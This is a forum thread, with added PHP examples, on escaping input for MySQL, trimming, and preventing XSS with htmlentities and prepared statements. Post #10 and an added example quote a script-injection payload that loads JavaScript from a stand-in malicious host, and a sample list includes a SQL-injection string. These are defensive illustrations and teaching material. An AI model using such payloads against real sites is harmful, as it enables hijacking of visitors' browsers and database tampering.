  1. #1
    vinpkl (SitePoint Guru)
    Join Date: Nov 2008
    Posts: 622

    mysql_real_escape_string with numeric value

    hi all

    I'm using the code below for validating a phone number:

    PHP Code:
    if(is_numeric($phone_number)) 
    Do I still need to use mysql_real_escape_string with the above code, even if I'm not inserting it into the database until it is a numeric value?

    vineet

  2. #2
    cpradio (Hosting Team Leader)
    Join Date: Jun 2002
    Location: Ohio
    Posts: 5,122
    Quote Originally Posted by vinpkl (post #1 above)
    No, you don't need to use mysql_real_escape_string on your $phone_number variable, because you already proved it only contains numbers. So that variable alone could not provoke a SQL Injection.
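Added worked example for the answer above (my code, not cpradio's and not from the thread): it prints which of a few constructed strings is_numeric() accepts, validates the phone number with a strict pattern instead, and inserts it with a prepared statement, which needs no mysql_real_escape_string at all. The table name, the is_phone_number() helper and the in-memory SQLite database are assumptions so that it runs offline; with MySQL only the DSN changes.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread. Shows what is_numeric() accepts and
// how a strict pattern plus a prepared statement removes the escaping question.

/** True only for a plausible phone number: optional leading "+", then 7 to 15 digits. */
function is_phone_number(string $s): bool
{
    return preg_match('/^\+?[0-9]{7,15}$/', $s) === 1;
}

// Constructed inputs. is_numeric() accepts exponents, signs, decimals and leading
// whitespace (and trailing whitespace since PHP 8), none of which belong in a phone
// number; hex strings such as "0x1A" were accepted before PHP 7.
$samples = [
    '9876543210',
    '+919876543210',
    '1e10',
    ' 9876543210',
    '.5',
    '0x1A',
    '98765-43210',
    "9876543210' OR '1'='1",
];

printf("%-28s %-11s %s\n", 'input', 'is_numeric', 'is_phone_number');
foreach ($samples as $s) {
    printf("%-28s %-11s %s\n",
        var_export($s, true),
        is_numeric($s) ? 'true' : 'false',
        is_phone_number($s) ? 'true' : 'false');
}

// Prepared statement: the value travels separately from the SQL text, so
// mysql_real_escape_string() is not needed whether the value is numeric or not.
// An in-memory SQLite database stands in for MySQL (assumption: pdo_sqlite is
// installed); with MySQL only the DSN changes.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE contacts (id INTEGER PRIMARY KEY, phone TEXT NOT NULL)');
$insert = $pdo->prepare('INSERT INTO contacts (phone) VALUES (:phone)');

foreach ($samples as $s) {
    if (!is_phone_number($s)) {
        continue; // reject rather than escape: the value is not a phone number
    }
    $insert->execute([':phone' => $s]);
}

foreach ($pdo->query('SELECT id, phone FROM contacts') as $row) {
    echo "stored: {$row['id']} {$row['phone']}\n";
}
```

Everything is_numeric() lets through is made of digits, sign, dot, exponent and whitespace, so it cannot break out of a query, but several of those values are not phone numbers, which makes it a weak validator for this field. With the bound parameter the escaping question does not arise at all, numeric or not.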

  3. #3
    vinpkl
    hi cp

    Should trim be used after it or before it?

    PHP Code:
    mysql_real_escape_string(trim($_POST['username'])); 
    or
    PHP Code:
    trim(mysql_real_escape_string($_POST['username'])); 
    vineet

  4. #4
    cpradio
    I'm not sure it would make a difference, but I usually put trim inside the mysql_real_escape_string call (like your first example).
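Added example (my code, not cpradio's and not from the thread) showing that the order does change the result for whitespace that mysql_real_escape_string() rewrites. Because mysql_real_escape_string() was removed in PHP 7 and needs a live connection anyway, the block uses a small stand-in, escape_like_mysql(), that backslash-escapes the same seven characters; that stand-in is an assumption for running offline, not a replacement for the real function or for prepared statements.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread.

/**
 * Offline stand-in for mysql_real_escape_string(): backslash-escapes the same
 * seven characters the real function escapes (NUL, \n, \r, \, ', " and Ctrl-Z).
 * The real function also depends on the connection charset, so this is only
 * for demonstration; in real code use mysqli::real_escape_string() with an open
 * connection, or better a prepared statement.
 */
function escape_like_mysql(string $s): string
{
    return strtr($s, [
        "\0"   => '\\0',
        "\n"   => '\\n',
        "\r"   => '\\r',
        "\\"   => '\\\\',
        "'"    => "\\'",
        '"'    => '\\"',
        "\x1a" => '\\Z',
    ]);
}

function trim_then_escape(string $s): string
{
    return escape_like_mysql(trim($s));
}

function escape_then_trim(string $s): string
{
    return trim(escape_like_mysql($s));
}

// Constructed input: a username followed by a newline, as a textarea or a
// copy-pasted value can deliver it.
$input = "vineet\n";

// With trim on the inside the newline is removed before escaping.
// With trim on the outside the newline has already become the two printable
// characters backslash and n, which trim() does not strip.
$inside  = trim_then_escape($input);
$outside = escape_then_trim($input);

printf("trim inside escape : %s (%d bytes)\n", json_encode($inside), strlen($inside));
printf("trim outside escape: %s (%d bytes)\n", json_encode($outside), strlen($outside));
```

With trim on the outside the stored value keeps a line break, because MySQL turns the escaped `\n` back into a newline on insert. Trim and any other normalisation first, escape last, and escape only the final value that goes into the query.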

  5. #5
    vinpkl
    hi cp

    Does htmlspecialchars() add another layer of security if used along with mysql_real_escape_string?

    vineet

  6. #6
    cpradio
    No, htmlspecialchars() does nothing for your database security. It does protect you against XSS attacks, and so should only be used when outputting the content to the page. I actually recommend htmlentities() instead of htmlspecialchars().

    Example:
    PHP Code:
    echo htmlentities($row['content']); 

  7. #7
    vinpkl
    hi cp

    I meant to ask:
    Suppose someone enters the name as "vin@#$".

    Then is it safe to add the name as it is to the database,
    or
    should we first convert the post data with htmlspecialchars or htmlentities and then add it to the database?

    vineet

  8. #8
    cpradio
    Quote Originally Posted by vinpkl (post #7 above)
    The only characters that are unsafe to a database are single and double quotes (which is why you use mysql_real_escape_string).

    htmlspecialchars or htmlentities DO NOT need to be used when inserting into the database/table. They only need to be used to prevent XSS attacks.

  9. #9
    vinpkl
    hi cp

    I'm new to XSS, so can you tell me:

    do XSS attacks happen only while outputting the data from the database,
    or
    are there other occasions when XSS attacks can happen?

    vineet

  10. #10
    cpradio
    XSS attacks can occur when you output ANY data that may have been entered by a User via QueryString, Form Data, data stored in a database, etc.

    In short, consider that the following was entered by your user as a comment (assume this is valid JavaScript):
    Code:
    <script type="text/javascript">document.body.append('<script type="text/javascript' src='http://mymalicioussite.com/myscript.js'></script>');</script>
    Without using htmlentities, it will try and execute the JavaScript the user entered as a comment.

    With htmlentities, it will output the comment as TEXT, so it can't be executed, as it will substitute all of the < and > signs to be &lt; and &gt; along with the quotes.

    The database won't ever try to execute the JavaScript, so it remains unaffected, but when you write that content back to the page for a user to see, that is where it becomes a problem.

    Hopefully this makes sense. Good question.
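Added example (my code, not cpradio's and not from the thread) for posts #6, #8 and #10 together: the comment is stored exactly as typed, with its quotes and angle brackets kept harmless to the SQL by bound parameters, and it is escaped only at the moment it is written into HTML. The in-memory SQLite table is an assumption so the block runs without MySQL, and the helper name h() is mine.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread.

/**
 * Escape a value for an HTML text node or a double-quoted attribute.
 * ENT_QUOTES covers both quote characters, ENT_SUBSTITUTE replaces invalid
 * byte sequences instead of returning "", and the charset is given explicitly.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed user input: the script payload from post #10 and the name from post #7.
$name    = 'vin@#$';
$comment = '<script>document.body.append(\'<script src="http://mymalicioussite.com/myscript.js"></script>\');</script>';

// 1. Storage: keep the raw text. An in-memory SQLite table stands in for MySQL
//    (assumption: pdo_sqlite is installed). The bound parameters make the quotes
//    and angle brackets irrelevant to the SQL.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, name TEXT NOT NULL, body TEXT NOT NULL)');
$pdo->prepare('INSERT INTO comments (name, body) VALUES (?, ?)')->execute([$name, $comment]);

$row = $pdo->query('SELECT name, body FROM comments')->fetch(PDO::FETCH_ASSOC);
if ($row['body'] !== $comment) {
    throw new RuntimeException('stored comment was altered on the way in');
}

// 2. Output: escaping happens here, once, for each place the value lands in HTML.
echo "<!-- unescaped: a browser would run the script -->\n";
echo '<p>', $row['body'], "</p>\n";

echo "<!-- escaped: the same bytes, shown as text -->\n";
echo '<p data-author="', h($row['name']), '">', h($row['body']), "</p>\n";

// htmlentities() additionally encodes non-ASCII characters such as the accented
// letter below; both functions neutralise the characters that matter for XSS
// (<, >, &, and the quotes).
echo htmlspecialchars('café <b>', ENT_QUOTES, 'UTF-8'), "\n";
echo htmlentities('café <b>', ENT_QUOTES, 'UTF-8'), "\n";
```

h() is right for text nodes and quoted attribute values only; a value written into a URL, inline JavaScript or CSS needs that context's own encoding. Keeping the stored value raw means the same row can later be sent to a JSON API or an e-mail without double-encoding.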

  11. #11
    vinpkl
    hi cp

    Do htmlentities() and htmlspecialchars()

    both work fine

    with only one particular charset (UTF or ISO),

    or with both charsets?

    vineet

  12. #12
    cpradio
    If you look at the PHP manual pages for both htmlentities and htmlspecialchars, you will see which encodings are supported and that you can tell it to use a specific encoding (if you want).

